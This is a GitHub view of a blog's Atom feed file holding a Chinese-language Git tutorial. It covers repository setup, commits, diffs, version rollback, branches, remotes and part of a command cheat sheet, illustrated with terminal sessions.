-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathatom.xml
More file actions
152 lines (85 loc) · 138 KB
/
atom.xml
File metadata and controls
152 lines (85 loc) · 138 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>f23y's blog</title>
<link href="https://f23y.github.io/atom.xml" rel="self"/>
<link href="https://f23y.github.io/"/>
<updated>2025-09-27T11:01:11.469Z</updated>
<id>https://f23y.github.io/</id>
<author>
<name>f23y</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Version Control (Git)</title>
<link href="https://f23y.github.io/2023/07/07/Version%20Control%20(Git)/"/>
<id>https://f23y.github.io/2023/07/07/Version%20Control%20(Git)/</id>
<published>2023-07-06T16:25:36.000Z</published>
<updated>2025-09-27T11:01:11.469Z</updated>
<content type="html"><![CDATA[<p>这篇文章是我在上一份工作中完成的,现在分享出来希望能帮到大家 ;)</p><p><a href="https://git-scm.com/docs/">官方文档</a> 方便查阅~</p><span id="more"></span><h2 id="安装Git"><a href="#安装Git" class="headerlink" title="安装Git"></a>安装Git</h2><h3 id="Ubuntu"><a href="#Ubuntu" class="headerlink" title="Ubuntu"></a>Ubuntu</h3><p>我的版本是ubuntu2204 LTS,git在ubuntu中已经预装,在<code>terminal</code>中输入<code>git</code>或<code>git version</code>以检查git版本。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~$ git</span><br><span class="line">usage: git [--version] [--<span class="built_in">help</span>] [-C <path>] [-c <name>=<value>]</span><br><span class="line"> [--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]</span><br><span class="line"> [-p | --paginate | -P | --no-pager] [--no-replace-objects] [--bare]</span><br><span class="line"> [--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]</span><br><span class="line"> [--super-prefix=<path>] [--config-env=<name>=<envvar>]</span><br><span class="line"> <<span class="built_in">command</span>> [<args>]</span><br><span class="line"></span><br><span class="line">These are common Git commands used <span class="keyword">in</span> various situations:</span><br><span class="line"></span><br><span class="line">start a working area (see also: git <span class="built_in">help</span> tutorial)</span><br><span class="line"> <span class="built_in">clone</span> Clone a repository into a new directory</span><br><span class="line"> init Create an empty Git repository or reinitialize an existing one</span><br><span class="line"></span><br><span class="line">work on the current change (see also: git <span class="built_in">help</span> everyday)</span><br><span class="line"> add Add file contents to the index</span><br><span class="line"> mv Move or rename a file, a directory, or a symlink</span><br><span class="line"> restore Restore working tree files</span><br><span class="line"> rm Remove files from the working tree and from the index</span><br><span class="line"></span><br><span class="line">examine the <span class="built_in">history</span> and state (see also: git <span class="built_in">help</span> revisions)</span><br><span class="line"> bisect Use binary search to find the commit that introduced a bug</span><br><span class="line"> diff Show changes between commits, commit and working tree, etc</span><br><span class="line"> grep Print lines matching a pattern</span><br><span class="line"> <span class="built_in">log</span> Show commit logs</span><br><span class="line"> show Show various types of objects</span><br><span class="line"> status Show the working tree status</span><br><span class="line"></span><br><span class="line">grow, mark and tweak your common <span class="built_in">history</span></span><br><span class="line"> branch List, create, or delete branches</span><br><span class="line"> commit Record changes to the repository</span><br><span class="line"> merge Join two or more development histories together</span><br><span class="line"> rebase Reapply commits on top of another base tip</span><br><span class="line"> reset Reset current HEAD to the specified state</span><br><span class="line"> switch Switch branches</span><br><span class="line"> tag Create, list, delete or verify a tag object signed with GPG</span><br><span class="line"></span><br><span class="line">collaborate (see also: git <span class="built_in">help</span> workflows)</span><br><span class="line"> fetch Download objects and refs from another repository</span><br><span class="line"> pull Fetch from and integrate with another repository or a <span class="built_in">local</span> branch</span><br><span class="line"> push Update remote refs along with associated objects</span><br><span class="line"></span><br><span class="line"><span class="string">'git help -a'</span> and <span class="string">'git help -g'</span> list available subcommands and some</span><br><span class="line">concept guides. See <span class="string">'git help <command>'</span> or <span class="string">'git help <concept>'</span></span><br><span class="line">to <span class="built_in">read</span> about a specific subcommand or concept.</span><br><span class="line">See <span class="string">'git help git'</span> <span class="keyword">for</span> an overview of the system.</span><br><span class="line">fr3y@fr3y-pc:~$ git --version</span><br><span class="line">14:24:49.617849 git.c:455 trace: built-in: git version</span><br><span class="line">git version 2.34.1</span><br></pre></td></tr></table></figure><h3 id="Mac-OS"><a href="#Mac-OS" class="headerlink" title="Mac OS"></a>Mac OS</h3><p>直接从AppStore安装Xcode,Xcode集成了Git,不过默认没有安装,你需要运行Xcode,选择菜单“Xcode”->“Preferences”,在弹出窗口中找到“Downloads”,选择“Command Line Tools”,点“Install”就可以完成安装了。</p><h3 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h3><p><a href="https://git-scm.com/downloads">从官网</a>下载。</p><h2 id="创建版本库"><a href="#创建版本库" class="headerlink" title="创建版本库"></a>创建版本库</h2><p>在<code>terminal</code>中输入:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ git config --global user.name "Your Name"</span><br><span class="line">$ git config --global user.email "email@example.com"</span><br></pre></td></tr></table></figure><p>注意<code>git config</code>命令的<code>--global</code>参数,用了这个参数,表示你这台机器上所有的Git仓库都会使用这个配置,当然也可以对某个仓库指定不同的用户名和Email地址。</p><p>创建新文件夹,打开,然后执行 <code>git init</code>以创建新的 git 仓库。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~$ mkdir learngit</span><br><span class="line">fr3y@fr3y-pc:~$ <span class="built_in">cd</span> learngit</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ <span class="built_in">pwd</span></span><br><span class="line">/home/fr3y/learngit</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git init</span><br><span class="line">15:50:51.222462 git.c:455 trace: built-in: git init</span><br><span class="line">hint: Using <span class="string">'master'</span> as the name <span class="keyword">for</span> the initial branch. This default branch name</span><br><span class="line">hint: is subject to change. To configure the initial branch name to use <span class="keyword">in</span> all</span><br><span class="line">hint: of your new repositories, <span class="built_in">which</span> will suppress this warning, call:</span><br><span class="line">hint: </span><br><span class="line">hint: git config --global init.defaultBranch <name></span><br><span class="line">hint: </span><br><span class="line">hint: Names commonly chosen instead of <span class="string">'master'</span> are <span class="string">'main'</span>, <span class="string">'trunk'</span> and</span><br><span class="line">hint: <span class="string">'development'</span>. The just-created branch can be renamed via this <span class="built_in">command</span>:</span><br><span class="line">hint: </span><br><span class="line">hint: git branch -m <name></span><br><span class="line">Initialized empty Git repository <span class="keyword">in</span> /home/fr3y/learngit/.git/</span><br></pre></td></tr></table></figure><h3 id="把文件添加到版本库"><a href="#把文件添加到版本库" class="headerlink" title="把文件添加到版本库"></a><strong>把文件添加到版本库</strong></h3><p>你的本地仓库由 git 维护的三棵“树”组成。第一个是你的 <code>工作目录</code>,它持有实际文件;第二个是 <code>暂存区(Index)</code>,它像个缓存区域,临时保存你的改动;最后是 <code>HEAD</code>,它指向你最后一次提交的结果。</p><p>你可以提出更改(把它们添加到暂存区),使用如下命令:<br> <code>git add <filename></code><br> <code>git add *</code><br>这是 git 基本工作流程的第一步;使用如下命令以实际提交改动:<br> <code>git commit -m "代码提交信息"</code><br><code>-m</code>后面输入的是本次提交的说明,可以输入任意内容。现在,你的改动已经提交到了 <strong>HEAD</strong>,但是还没到你的远端仓库。</p><p>下面创建一个readme.txt,在里面写入<code>Hello Git!</code>之后提交。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ touch readme.txt</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ cat readme.txt</span><br><span class="line">Hello Git!</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git add readme.txt</span><br><span class="line">16:23:13.117650 git.c:455 trace: built-in: git add readme.txt</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git commit -m <span class="string">"wrote a readme file"</span></span><br><span class="line">16:25:33.582306 git.c:455 trace: built-in: git commit -m <span class="string">'wrote a readme file'</span></span><br><span class="line">16:25:33.588250 run-command.c:668 trace: run_command: git maintenance run --auto --no-quiet</span><br><span class="line">16:25:33.607080 git.c:455 trace: built-in: git maintenance run --auto --no-quiet</span><br><span class="line">[master (root-commit) b3a217b] wrote a readme file</span><br><span class="line"> 1 file changed, 1 insertion(+)</span><br><span class="line"> create mode 100644 readme.txt</span><br></pre></td></tr></table></figure><p>接下来我们在readme.txt中添加一行<code>Git is a distributed version control system.</code>之后运行<code>git status</code>。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git status</span><br><span class="line">16:43:03.856838 git.c:455 trace: built-in: git status</span><br><span class="line">On branch master</span><br><span class="line">Changes not staged <span class="keyword">for</span> commit:</span><br><span class="line"> (use <span class="string">"git add <file>..."</span> to update what will be committed)</span><br><span class="line"> (use <span class="string">"git restore <file>..."</span> to discard changes <span class="keyword">in</span> working directory)</span><br><span class="line">modified: readme.txt</span><br><span class="line"></span><br><span class="line">no changes added to commit (use <span class="string">"git add"</span> and/or <span class="string">"git commit -a"</span>)</span><br></pre></td></tr></table></figure><p><code>git status</code>命令可以让我们时刻掌握仓库当前的状态,上面的命令输出告诉我们,<code>readme.txt</code>被修改过了,但还没有准备提交的修改。</p><p>使用<code>git diff</code>查看修改了什么内容。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git diff readme.txt </span><br><span class="line">16:46:33.087526 git.c:455 trace: built-in: git diff readme.txt</span><br><span class="line">16:46:33.087753 run-command.c:668 trace: run_command: <span class="built_in">unset</span> GIT_PAGER_IN_USE; LESS=FRX LV=-c pager</span><br><span class="line">diff --git a/readme.txt b/readme.txt</span><br><span class="line">index 106287c..768b2ea 100644</span><br><span class="line">--- a/readme.txt</span><br><span class="line">+++ b/readme.txt</span><br><span class="line">@@ -1 +1,2 @@</span><br><span class="line"> Hello Git!</span><br><span class="line">+Git is a distributed version control system.</span><br></pre></td></tr></table></figure><p>提交修改。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git add readme.txt</span><br><span class="line">16:48:27.422250 git.c:455 trace: built-in: git add readme.txt</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git status</span><br><span class="line">16:48:47.928238 git.c:455 trace: built-in: git status</span><br><span class="line">On branch master</span><br><span class="line">Changes to be committed:</span><br><span class="line"> (use <span class="string">"git restore --staged <file>..."</span> to unstage)</span><br><span class="line">modified: readme.txt</span><br><span class="line"></span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git commit -m <span class="string">"add a sentence"</span></span><br><span class="line">16:49:48.431119 git.c:455 trace: built-in: git commit -m <span class="string">'add a sentence'</span></span><br><span class="line">16:49:48.434682 run-command.c:668 trace: run_command: git maintenance run --auto --no-quiet</span><br><span class="line">16:49:48.436286 git.c:455 trace: built-in: git maintenance run --auto --no-quiet</span><br><span class="line">[master 354bc8d] add a sentence</span><br><span class="line"> 1 file changed, 1 insertion(+)</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git status</span><br><span class="line">16:50:12.694291 git.c:455 trace: built-in: git status</span><br><span class="line">On branch master</span><br><span class="line">nothing to commit, working tree clean</span><br></pre></td></tr></table></figure><h4 id="版本回退"><a href="#版本回退" class="headerlink" title="版本回退"></a><strong>版本回退</strong></h4><p>用<code>git log</code>查看历史记录,可加<code>--pretty=oneline</code>简洁输出。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git <span class="built_in">log</span></span><br><span class="line">21:14:00.857909 git.c:455 trace: built-in: git <span class="built_in">log</span></span><br><span class="line">21:14:00.860545 run-command.c:668 trace: run_command: <span class="built_in">unset</span> GIT_PAGER_IN_USE; LESS=FRX LV=-c pager</span><br><span class="line">commit b2e5ef1688ec5ab1db4fef39c3ab497efccf2691 (HEAD -> master)</span><br><span class="line">Author: fr3y <fr3y@qq.com></span><br><span class="line">Date: Fri Jul 1 21:03:51 2022 +0800</span><br><span class="line"></span><br><span class="line"> append GPL</span><br><span class="line"></span><br><span class="line">commit 354bc8d6c2d30c2627b7c7b2195f4907adf5e8a6</span><br><span class="line">Author: fr3y <fr3y@qq.com></span><br><span class="line">Date: Thu Jun 30 16:49:48 2022 +0800</span><br><span class="line"></span><br><span class="line"> add a sentence</span><br><span class="line"></span><br><span class="line">commit b3a217bf0f776da017119085fcde8b8133edb93a</span><br><span class="line">Author: fr3y <fr3y@qq.com></span><br><span class="line">Date: Thu Jun 30 16:25:33 2022 +0800</span><br><span class="line"></span><br><span class="line"> wrote a readme file</span><br></pre></td></tr></table></figure><p>使用<code>git reset</code>回退到上一个版本<code>add a sentence</code>。<code>HEAD</code>表示上一版本,^表示前一版本。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git reset --hard HEAD^</span><br><span class="line">21:28:29.207423 git.c:455 trace: built-in: git reset --hard HEAD^</span><br><span class="line">HEAD is now at 354bc8d add a sentence</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ cat readme.txt</span><br><span class="line">Hello Git!</span><br><span class="line">Git is a distributed version control system.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>回退到任一版本,输入<code>git reset --hard</code>+<code>commit id</code> 前几位。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git reset --hard b2e5e</span><br><span class="line">21:32:41.759184 git.c:455 trace: built-in: git reset --hard b2e5e</span><br><span class="line">HEAD is now at b2e5ef1 append GPL</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ cat readme.txt</span><br><span class="line">Hello Git!</span><br><span class="line">Git is a distributed version control system under the GPL.</span><br></pre></td></tr></table></figure><p>使用<code>git reflog</code>用来记录你的每一次命令。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git reflog</span><br><span class="line">21:50:58.489027 git.c:455 trace: built-in: git reflog</span><br><span class="line">21:50:58.489821 run-command.c:668 trace: run_command: <span class="built_in">unset</span> GIT_PAGER_IN_USE; LESS=FRX LV=-c pager</span><br><span class="line">b2e5ef1 (HEAD -> master) HEAD@{0}: reset: moving to b2e5e</span><br><span class="line">354bc8d HEAD@{1}: reset: moving to HEAD^</span><br><span class="line">b2e5ef1 (HEAD -> master) HEAD@{2}: commit: append GPL</span><br><span class="line">354bc8d HEAD@{3}: commit: add a sentence</span><br><span class="line">b3a217b HEAD@{4}: commit (initial): wrote a readme file</span><br></pre></td></tr></table></figure><h4 id="撤销和删除"><a href="#撤销和删除" class="headerlink" title="撤销和删除"></a>撤销和删除</h4><p>把工作区的修改全部撤销。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git checkout -- readme.txt</span><br></pre></td></tr></table></figure><p><code>git reset HEAD <file></code>可以把暂存区的修改撤销掉(unstage),重新放回工作区。</p><p>从版本库中删除文件:用<code>git rm</code>删掉,并且<code>git commit</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ git rm test.txt</span><br><span class="line">$ git commit -m <span class="string">"remove test.txt"</span></span><br></pre></td></tr></table></figure><h2 id="远程仓库"><a href="#远程仓库" class="headerlink" title="远程仓库"></a>远程仓库</h2><h3 id="创建SSH-Key"><a href="#创建SSH-Key" class="headerlink" title="创建SSH Key"></a>创建SSH Key</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ssh-keygen -t rsa -C <span class="string">"youremail@example.com"</span></span><br></pre></td></tr></table></figure><p>生成<code>.ssh</code>目录,里面有<code>id_rsa</code>(私钥)和<code>id_rsa.pub</code>(公钥)两个文件。登陆GitHub,打开“Account settings”,“SSH Keys”页面,点“Add SSH Key”,填上任意Title,在Key文本框里粘贴<code>id_rsa.pub</code>文件的内容,点“Add Key”,你就应该看到已经添加的Key。</p><h3 id="添加远程库"><a href="#添加远程库" class="headerlink" title="添加远程库"></a>添加远程库</h3><p>登陆GitHub,在右上角找到“Create a new repo”按钮,创建一个新的仓库,在本地的<code>learngit</code>仓库下运行命令:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git remote add origin git@github.f23y/learngit.git</span><br></pre></td></tr></table></figure><p>下一步,就可以把本地库的所有内容推送到远程库上:<code>git push -u origin master</code></p><p>之后推送后就可以去掉-u参数。</p><h3 id="删除远程库"><a href="#删除远程库" class="headerlink" title="删除远程库"></a>删除远程库</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ git remote -v</span><br><span class="line">$ git remote rm origin</span><br></pre></td></tr></table></figure><h3 id="克隆远程库"><a href="#克隆远程库" class="headerlink" title="克隆远程库"></a>克隆远程库</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> username@host:/path/to/repository</span><br></pre></td></tr></table></figure><h2 id="分支"><a href="#分支" class="headerlink" title="分支"></a>分支</h2><p>分支是用来绝缘开发功能的。在你创建仓库的时候,<em>master</em> 是主分支。在其他分支上进行开发,完成后再将它们合并到主分支上。</p><h3 id="Create"><a href="#Create" class="headerlink" title="Create"></a>Create</h3><p>创建一个叫dev的分支。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git checkout -b dev</span><br><span class="line">00:05:42.329505 git.c:455 trace: built-in: git checkout -b dev</span><br><span class="line">Switched to a new branch <span class="string">'dev'</span></span><br></pre></td></tr></table></figure><p>修改readme.txt,加上一句<code>Branches are amazing.</code>并提交。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ cat readme.txt</span><br><span class="line">Hello Git!</span><br><span class="line">Git is a distributed version control system under the GPL.</span><br><span class="line">Branches are amazing.</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git add readme.txt </span><br><span class="line">00:13:37.503954 git.c:455 trace: built-in: git add readme.txt</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git commit -m <span class="string">"branch test"</span></span><br><span class="line">00:13:53.264494 git.c:455 trace: built-in: git commit -m <span class="string">'branch test'</span></span><br><span class="line">00:13:53.266471 run-command.c:668 trace: run_command: git maintenance run --auto --no-quiet</span><br><span class="line">00:13:53.268711 git.c:455 trace: built-in: git maintenance run --auto --no-quiet</span><br><span class="line">[dev 2b34020] branch <span class="built_in">test</span></span><br><span class="line"> 1 file changed, 1 insertion(+)</span><br></pre></td></tr></table></figure><h3 id="Delete"><a href="#Delete" class="headerlink" title="Delete"></a>Delete</h3><p>切换回主分支,合并分支,删除分支。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">fr3y@fr3y-pc:~/learngit$ git checkout master</span><br><span class="line">00:14:06.064454 git.c:455 trace: built-in: git checkout master</span><br><span class="line">Switched to branch <span class="string">'master'</span></span><br><span class="line">fr3y@fr3y-pc:~/learngit$ cat readme.txt</span><br><span class="line">Hello Git!</span><br><span class="line">Git is a distributed version control system under the GPL.</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git merge dev</span><br><span class="line">00:14:37.890681 git.c:455 trace: built-in: git merge dev</span><br><span class="line">Updating b2e5ef1..2b34020</span><br><span class="line">Fast-forward</span><br><span class="line">00:14:37.901014 run-command.c:668 trace: run_command: git maintenance run --auto --no-quiet</span><br><span class="line">00:14:37.902864 git.c:455 trace: built-in: git maintenance run --auto --no-quiet</span><br><span class="line"> readme.txt | 1 +</span><br><span class="line"> 1 file changed, 1 insertion(+)</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git branch -d dev</span><br><span class="line">00:15:24.651829 git.c:455 trace: built-in: git branch -d dev</span><br><span class="line">Deleted branch dev (was 2b34020).</span><br><span class="line">fr3y@fr3y-pc:~/learngit$ git branch</span><br><span class="line">00:15:55.718369 git.c:455 trace: built-in: git branch</span><br><span class="line">00:15:55.718654 run-command.c:668 trace: run_command: <span class="built_in">unset</span> GIT_PAGER_IN_USE; LESS=FRX LV=-c pager</span><br><span class="line">* master</span><br></pre></td></tr></table></figure><h3 id="switch"><a href="#switch" class="headerlink" title="switch"></a>switch</h3><p>创建并切换到新的<code>dev</code>分支,可以使用:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git switch -c dev</span><br></pre></td></tr></table></figure><p>直接切换到已有的<code>master</code>分支,可以使用:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git switch master</span><br></pre></td></tr></table></figure><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>Git和其他版本控制系统如SVN的一个不同之处就是有暂存区的概念。</p><p>Git跟踪并管理的是修改,而非文件。</p><h3 id="Git-Cheat-Sheet"><a href="#Git-Cheat-Sheet" class="headerlink" title="Git Cheat Sheet"></a>Git Cheat Sheet</h3><h4 id="配置"><a href="#配置" class="headerlink" title="配置"></a>配置</h4><h5 id="列出当前配置:"><a href="#列出当前配置:" class="headerlink" title="列出当前配置:"></a>列出当前配置:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --list</span><br></pre></td></tr></table></figure><h5 id="列出repository配置:"><a href="#列出repository配置:" class="headerlink" title="列出repository配置:"></a>列出repository配置:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --local --list</span><br></pre></td></tr></table></figure><h5 id="列出全局配置:"><a href="#列出全局配置:" class="headerlink" title="列出全局配置:"></a>列出全局配置:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --global --list</span><br></pre></td></tr></table></figure><h5 id="列出系统配置:"><a href="#列出系统配置:" class="headerlink" title="列出系统配置:"></a>列出系统配置:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --system --list</span><br></pre></td></tr></table></figure><h5 id="设置用户名:"><a href="#设置用户名:" class="headerlink" title="设置用户名:"></a>设置用户名:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --global user.name “[firstname lastname]”</span><br></pre></td></tr></table></figure><h5 id="设置用户邮箱:"><a href="#设置用户邮箱:" class="headerlink" title="设置用户邮箱:"></a>设置用户邮箱:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git config --global user.email “[valid-email]”</span><br></pre></td></tr></table></figure><h5 id="复制一个已创建的仓库"><a href="#复制一个已创建的仓库" class="headerlink" title="复制一个已创建的仓库:"></a>复制一个已创建的仓库:</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 通过 SSH</span></span><br><span class="line">$ git <span class="built_in">clone</span> ssh://user@domain.com/repo.git</span><br><span class="line"></span><br><span class="line"><span class="comment">#通过 HTTP</span></span><br><span class="line">$ git <span class="built_in">clone</span> http://domain.com/user/repo.git</span><br></pre></td></tr></table></figure><h5 id="创建一个新的本地仓库"><a href="#创建一个新的本地仓库" class="headerlink" title="创建一个新的本地仓库:"></a>创建一个新的本地仓库:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git init</span><br></pre></td></tr></table></figure><h4 id="本地修改"><a href="#本地修改" class="headerlink" title="本地修改"></a>本地修改</h4><h5 id="显示工作路径下已修改的文件:"><a href="#显示工作路径下已修改的文件:" class="headerlink" title="显示工作路径下已修改的文件:"></a>显示工作路径下已修改的文件:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git status</span><br></pre></td></tr></table></figure><h5 id="显示与上次提交版本文件的不同:"><a 